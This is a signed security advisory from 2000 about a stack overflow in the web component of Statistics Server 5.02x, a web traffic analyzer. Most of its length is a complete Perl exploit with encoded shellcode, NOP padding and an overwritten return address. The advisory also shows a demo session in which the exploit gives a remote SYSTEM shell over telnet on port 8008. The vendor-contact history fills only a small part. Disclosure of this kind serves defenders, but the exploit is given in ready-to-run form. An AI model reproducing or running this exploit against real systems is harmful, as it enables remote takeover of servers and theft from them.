-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Statistics Server 5.02x overflow Advisory Name: Statistics Server Live Stats Advisory Released: [00/08/10] Application: Web site traffic analyzer Severity: local/remote user can run arbitrary code with WebServer privileges Status: vendor contacted Authors: Nemo - nemo@deepzone.org |Zan - izan@deepzone.org WWW: http://www.deepzone.org http://deepzone.cjb.net ___________________________________________________________________ OVERVIEW 'Statistics Server is far more than just another log analyzer. It analyzes Web site traffic in "Real-time" and generates "Live Stats" reports in an easy to use Web interface.' 'The ability of Statistics Server to deliver Live Web statistics for high volume installations has made it an essential component of many corporate Internet and Intranet Web sites and ISP Web hosting installations.' ___________________________________________________________________ BACKGROUND Statistics Server 5.02x ships with a stack overflow in its web component. It *lets run arbitrary code inside* by local/remote user. Tests, ideas & exploits were tested against Win2k/Spanish version and WinNT 4.0/sp6a Spanish version. Web server runs like a system service with a default installation. ___________________________________________________________________ DETAILS Web server can't handle long requests correctly. When a long GET (about 2033 bytes) request is made. It dies with EIP overwritten. It lets run arbitrary code with web servers privileges (system privileges by default). ___________________________________________________________________ EXPLOIT It spawns a remote winshell on 8008 port. It doesn't kill webserver so webserver continues running while hack is made. When hack is finished webserver will run perfectly too. ex. $ lynx http://vulnerable.com Server Selection Please Enter Server ID _____________ GO .... $ ./ssexploit502x.pl vulnerable.com 80 (c) Deep Zone - Statistics Server 5.02x's exploit Coded by |Zan - izan@deepzone.org -=[ http://www.deepzone.org - http://deepzone.cjb.net ]=- spawning remote shell on port 8008 ... HTTP/1.0 302 Server: Statistics Server 5.0 Location: /_XXXXXXXXX_http://XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ... ... ... ... ... ... ... Content-Type: text/html Connection: Keep-Alive Content-Lenght: 0 ... done. $ lynx http://vulnerable.com (It continues working }:) Server Selection Please Enter Server ID _____________ GO .... $ telnet vulnerable.com 8008 Trying vulnerable.com... Connected to vulnerable.com. Escape character is '^]'. Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. D:\StatisticsServer> ___________________________________________________________________ FIXES/PATCHES We contacted Statistics Server support in http://www.mediahouse.com six weeks ago. Firstly they told us that new release didn't contain any bof bug. When we sent a DoS source they told us that new release could have some problem and it will be fixed in next new release, while we will be kept to update with fix progress. We weren't contacted again. Any news about mediahouse.com Two days ago we email them again asking them about patchs, fixes and progress. We haven't any reply. ___________________________________________________________________ EXPLOIT SOURCE bug was discovered by Nemo - nemo@deepzone.org while auditing a very important spanish ISP (others affected). bug was exploited by |Zan - izan@deepzone.org exploit works against Win2k/Statistics Server 5.02x running like service. #!/usr/bin/perl -w # Statistics Server 5.02x's exploit. # usage: ./ssexploit502x.pl hostname port # 00/08/10 # http://www.deepzone.org # http://deepzone.cjb.net # http://mareasvivas.cjb.net (|Zan homepage) # # --|Zan # ---------------------------------------------------------------- # # This exploit works against Statistics Server 5.02x/Win2k. # # Tested with Win2k (spanish version). # # It spawns a remote winshell on 8008 port. It doesn't kill # webserver so webserver continues running while hack is made. # When hack is finished webserver will run perfectly too. # # Default installation gives us a remote shell with system # privileges. # # overflow discovered by # -- Nemo # # exploit coded by # -- |Zan # # ---------------------------------------------------------------- use IO::Socket; @crash = ( "\x68","\x8b","\x41","\x1d","\x01","\x68","\x41","\x41","\x41", "\x41","\x68","\x61","\x41","\x41","\x41","\x58","\x59","\x5f", "\x2b","\xc1","\xaa","\x33","\xc9","\x66","\xb9","\x71","\x04", "\x90","\x90","\x90","\x68","\xbd","\x3e","\x1d","\x01","\x5e", "\x56","\x5f","\x33","\xd2","\x80","\xc2","\x99","\xac","\x32", "\xc2","\xaa","\xe2","\xfa","\x71","\x99","\x99","\x99","\x99", "\xc4","\x18","\x74","\xaf","\x89","\xd9","\x99","\x14","\x2c", "\xd4","\x8a","\xd9","\x99","\x14","\x24","\xcc","\x8a","\xd9", "\x99","\xf3","\x9e","\x09","\x09","\x09","\x09","\xc0","\x71", "\x4b","\x9b","\x99","\x99","\x14","\x2c","\x1c","\x8a","\xd9", "\x99","\x14","\x24","\x17","\x8a","\xd9","\x99","\xf3","\x93", "\x09","\x09","\x09","\x09","\xc0","\x71","\x23","\x9b","\x99", "\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d","\xd9","\x99", "\xcf","\x14","\x2c","\x87","\x8d","\xd9","\x99","\xcf","\x14", "\x2c","\xbb","\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x17", "\x8a","\xd9","\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d", "\xd9","\x99","\xcf","\x14","\x2c","\xbf","\x8d","\xd9","\x99", "\xcf","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\xcf","\x66", "\x0c","\x17","\x8a","\xd9","\x99","\x5e","\x1c","\xb7","\x8d", "\xd9","\x99","\xdd","\x99","\x99","\x99","\x14","\x2c","\xb7", "\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x0b","\x8a","\xd9", "\x99","\x14","\x2c","\xff","\x8d","\xd9","\x99","\x34","\xc9", "\x66","\x0c","\x37","\x8a","\xd9","\x99","\x14","\x2c","\xf3", "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x37","\x8a", "\xd9","\x99","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\x14", "\x24","\xff","\x8d","\xd9","\x99","\x3c","\x14","\x2c","\x87", "\x8d","\xd9","\x99","\x34","\x14","\x24","\xf3","\x8d","\xd9", "\x99","\x32","\x14","\x24","\xf7","\x8d","\xd9","\x99","\x32", "\x5e","\x1c","\xc7","\x8d","\xd9","\x99","\x99","\x99","\x99", "\x99","\x5e","\x1c","\xc3","\x8d","\xd9","\x99","\x98","\x98", "\x99","\x99","\x14","\x2c","\xeb","\x8d","\xd9","\x99","\xcf", "\x14","\x2c","\xb7","\x8d","\xd9","\x99","\xcf","\xf3","\x99", "\xf3","\x99","\xf3","\x89","\xf3","\x98","\xf3","\x99","\xf3", "\x99","\x14","\x2c","\x1b","\x8d","\xd9","\x99","\xcf","\xf3", "\x99","\x66","\x0c","\x0f","\x8a","\xd9","\x99","\xf1","\x99", "\xb9","\x99","\x99","\x09","\xf1","\x99","\x9b","\x99","\x99", "\x66","\x0c","\x07","\x8a","\xd9","\x99","\x10","\x1c","\x13", "\x8d","\xd9","\x99","\xaa","\x59","\xc9","\xd9","\xc9","\xd9", "\xc9","\x66","\x0c","\xcc","\x8a","\xd9","\x99","\xc9","\xc2", "\xf3","\x89","\x14","\x2c","\x9b","\x8d","\xd9","\x99","\xcf", "\xca","\x66","\x0c","\xc0","\x8a","\xd9","\x99","\xf3","\x9a", "\xca","\x66","\x0c","\xc4","\x8a","\xd9","\x99","\x14","\x2c", "\x17","\x8d","\xd9","\x99","\xcf","\x14","\x2c","\x9b","\x8d", "\xd9","\x99","\xcf","\xca","\x66","\x0c","\xf8","\x8a","\xd9", "\x99","\x14","\x24","\x0b","\x8d","\xd9","\x99","\x32","\xaa", "\x59","\xc9","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce", "\xc9","\xc9","\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99", "\x34","\xc9","\x66","\x0c","\x03","\x8a","\xd9","\x99","\xf3", "\xa9","\x66","\x0c","\x33","\x8a","\xd9","\x99","\x72","\xd4", "\x09","\x09","\x09","\xaa","\x59","\xc9","\x14","\x24","\x07", "\x8d","\xd9","\x99","\xce","\xc9","\xc9","\xc9","\x14","\x2c", "\xbb","\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03", "\x8a","\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a", "\xd9","\x99","\x1a","\x24","\x07","\x8d","\xd9","\x99","\x9b", "\x96","\x1b","\x8e","\x98","\x99","\x99","\x18","\x24","\x07", "\x8d","\xd9","\x99","\x98","\xb9","\x99","\x99","\xeb","\x97", "\x09","\x09","\x09","\x09","\x5e","\x1c","\x07","\x8d","\xd9", "\x99","\x99","\xb9","\x99","\x99","\xf3","\x99","\x12","\x1c", "\x07","\x8d","\xd9","\x99","\x14","\x24","\x07","\x8d","\xd9", "\x99","\xce","\xc9","\x12","\x1c","\x13","\x8d","\xd9","\x99", "\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99","\x34","\xc9", "\x66","\x0c","\x3b","\x8a","\xd9","\x99","\xf3","\xa9","\x66", "\x0c","\x33","\x8a","\xd9","\x99","\x12","\x1c","\x07","\x8d", "\xd9","\x99","\xf3","\x99","\xc9","\x14","\x2c","\x13","\x8d", "\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9", "\x99","\x34","\xc9","\x66","\x0c","\xfc","\x8a","\xd9","\x99", "\xf3","\x99","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce", "\xf3","\x99","\xf3","\x99","\xf3","\x99","\x14","\x2c","\xbb", "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03","\x8a", "\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9", "\x99","\xaa","\x50","\xa0","\x14","\x07","\x8d","\xd9","\x99", "\x96","\x1e","\xfe","\x66","\x66","\x66","\xf3","\x99","\xf1", "\x99","\xb9","\x99","\x99","\x09","\x14","\x2c","\x13","\x8d", "\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9", "\x99","\x34","\xc9","\x66","\x0c","\xf0","\x8a","\xd9","\x99", "\x10","\x1c","\x03","\x8d","\xd9","\x99","\xf3","\x99","\x14", "\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x14","\x2c", "\x13","\x8d","\xd9","\x99","\x34","\xc9","\x14","\x2c","\xbf", "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3f","\x8a", "\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9", "\x99","\xf3","\x99","\x12","\x1c","\x03","\x8d","\xd9","\x99", "\x14","\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x12", "\x1c","\x13","\x8d","\xd9","\x99","\xc9","\x14","\x2c","\xbb", "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3b","\x8a", "\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9", "\x99","\x70","\x90","\x67","\x66","\x66","\x14","\x2c","\x0b", "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\xf4","\x8a", "\xd9","\x99","\x14","\x2c","\x0f","\x8d","\xd9","\x99","\x34", "\xc9","\x66","\x0c","\xf4","\x8a","\xd9","\x99","\xf3","\x99", "\x66","\x0c","\x2b","\x8a","\xd9","\x99","\xc8","\xcf","\xf1", "\x6d","\x39","\xdc","\x99","\xc3","\x66","\x8b","\xc9","\xc2", "\xc0","\xce","\xc7","\xc8","\xcf","\xca","\xf1","\xe5","\x38", "\xdc","\x99","\xc3","\x66","\x8b","\xc9","\x35","\x1d","\x59", "\xec","\x62","\xc1","\x32","\xc0","\x7b","\x73","\x5a","\xce", "\xca","\xd6","\xda","\xd2","\xaa","\xab","\x99","\xea","\xf6", "\xfa","\xf2","\xfc","\xed","\x99","\xfb","\xf0","\xf7","\xfd", "\x99","\xf5","\xf0","\xea","\xed","\xfc","\xf7","\x99","\xf8", "\xfa","\xfa","\xfc","\xe9","\xed","\x99","\xea","\xfc","\xf7", "\xfd","\x99","\xeb","\xfc","\xfa","\xef","\x99","\xfa","\xf5", "\xf6","\xea","\xfc","\xea","\xf6","\xfa","\xf2","\xfc","\xed", "\x99","\xd2","\xdc","\xcb","\xd7","\xdc","\xd5","\xaa","\xab", "\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xf0", "\xe9","\xfc","\x99","\xde","\xfc","\xed","\xca","\xed","\xf8", "\xeb","\xed","\xec","\xe9","\xd0","\xf7","\xff","\xf6","\xd8", "\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xeb", "\xf6","\xfa","\xfc","\xea","\xea","\xd8","\x99","\xc9","\xfc", "\xfc","\xf2","\xd7","\xf8","\xf4","\xfc","\xfd","\xc9","\xf0", "\xe9","\xfc","\x99","\xde","\xf5","\xf6","\xfb","\xf8","\xf5", "\xd8","\xf5","\xf5","\xf6","\xfa","\x99","\xcb","\xfc","\xf8", "\xfd","\xdf","\xf0","\xf5","\xfc","\x99","\xce","\xeb","\xf0", "\xed","\xfc","\xdf","\xf0","\xf5","\xfc","\x99","\xca","\xf5", "\xfc","\xfc","\xe9","\x99","\xda","\xf5","\xf6","\xea","\xfc", "\xd1","\xf8","\xf7","\xfd","\xf5","\xfc","\x99","\xdc","\xe1", "\xf0","\xed","\xcd","\xf1","\xeb","\xfc","\xf8","\xfd","\x99", "\x9b","\x99","\x86","\xd1","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x95","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x98","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\xda","\xd4","\xdd","\xb7","\xdc","\xc1","\xdc", "\x99","\x99","\x99","\x99","\x99","\x89","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99", "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x90","\x90"); # ---------------------------------------------------------------- sub pcommands { die "usage: $0 hostname port\n" if (@ARGV != 2); ($host) = shift @ARGV; ($port) = shift @ARGV; } sub show_credits { print "\n\n\t (c) 2000 Deep Zone - Statistics Server 5.02x's"; print "exploit\n\n\t\t Coded by |Zan - izan\@deepzone.org\n"; print "\n\t-=[ http://www.deepzone.org - http://deepzone.cjb"; print ".net ]=-\n\n"; } sub bofit { print "\nspawning remote shell on port 8008 ...\n\n"; $s = IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>"tcp"); if(!$s) { die "error.\n"; } print $s "GET http://O"; foreach $item (@crash) { print $s $item } for ($cont=0; $cont<840;$cont++) { print $s "\x90" } print $s "\x8c\x3e\x1d\x01"; print $s "\r\n\r\n"; while (<$s>) { print } print "... done.\n\n"; } # ----- begin show_credits; pcommands; bofit; # ----- that's all :) ___________________________________________________________________ GREETINGS Attrition, beavuh, ADM, Technotronic, b0f .... and of course .... RFP and Wiretrip -- ] EOF - -- |Zan / DeepZone (tm) - Digital Security Center http://www.deepzone.org - http://mareasvivas.cjb.net PGP key fingerprint: AD 97 A6 AB DC BB D2 CF 89 AE 0A 88 7E 5D 9D 97 BB F6 B0 B8 - --=[ ... toda la vida buscando respuestas ... y cuando por fin las encuentras ... cambian las preguntas ]=-- -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.3 for non-commercial use iQA/AwUBOZL7j35dnZe79rC4EQKNBgCg50QJs6JqKM0gOjBJ+KfaQ7lWAnwAnAkI IS4fs41nCvWP7tULf0KwU0m8 =Gnrm -----END PGP SIGNATURE-----